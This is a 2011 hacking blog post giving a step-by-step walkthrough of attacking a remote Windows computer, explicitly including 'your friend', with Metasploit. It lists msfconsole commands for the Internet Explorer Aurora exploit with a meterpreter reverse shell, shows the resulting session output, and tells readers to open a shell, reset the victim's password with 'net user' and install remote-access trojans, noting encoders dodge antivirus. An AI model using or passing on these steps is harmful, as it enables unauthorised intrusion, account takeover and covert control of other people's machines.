Pages

Subscribe:

Monday, 5 September 2011

Hacking a remote computer or web server or your friend with Metasploit


What is Metasploit

Before continuing read our disclaimer

Metasploit is an Penetration testing tool by Rapid7

Download Metasploit here

Metasploit Download - Rapid7 


Now install it .

What is Metasploit?



It is an exploitation framwork , written in Ruby.

It has a wide range of pre developed exploits and few usefull application like "nmap" attached with it.It was primarily developed for penetration testing but now it has come out to be must needed tool for hackers



So lets start hacking!



start msfconsole Start>Search>msfconsole

or in Linux ./msfconsole

Start by typing
Code:
help
It will show all commands.

Some stuff abt metasploit.



Exploits are methods by which u can get into another system



Payloads are stuff that are injected into other computers when u exploit them

What payloads can do?

They can execute commands or a special shell can function as a RAT(meterpreter).

What are encoders?

Encoders prevent detection by Anti-viruses



Okay now to the serious stuff!



in the console , u can exploit other computers , here i will show abt the famous internet explorer Aurora hack .



#1 Windows IE Aurora

type in the following commands

Code:
msf > use exploit/windows/browser/ms10_002_aurora

msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_002_aurora) > set LHOST (your IP)

msf exploit(ms10_002_aurora) > set URIPATH /

msf exploit(ms10_002_aurora) > exploit
Now it will show like this (but with ur ip)

Code:
[*] Exploit running as background job.

[*] Started reverse handler on port 4444

[*] Local IP: http://192.168.0.151:8080/

[*] Server started.
P.S:-Server is run on Ruby on Rails so u need to portforward.Do not know how ? See Here Port Forward ME!!!

Open Internet Explorer on a vulnerable machine and enter the Local IP URL(i.e the Local IP that metasploit displayed here it is http://192.168.0.151:8080/) into the browser. If the exploit succeeds, you should see a new session in the Metasploit .

Console:

Code:
[*] Sending stage (723456 bytes)

[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)



msf exploit(ie_aurora) > sessions -i 1

[*] Starting interaction with 1...



meterpreter > getuid

Server username: WINXP\PakH3X0r
now type
Code:
shell
and u can toy with that computer !!!.
P.s:- to change passwords

Code:
net user [user_name] [new_password]
You can then install RATS or ur favorite tool.

Posted by PakH3X0r at 11:44
Labels: , ,

3 comments:

Anonymous said...

Is it through the metasploit that the cmds are done

6 September 2011 at 06:37
PakH3X0r said...

Meta Sploit is not a CMD i look like but it have different commands

7 September 2011 at 12:25
PakH3X0r said...

Also check how to convert Windows & to Windows * http://h4ckcorner.blogspot.com/2011/09/how-to-get-windows-8-interface.html

7 September 2011 at 12:27

Post a Comment

Subscribe to: Post Comments (Atom)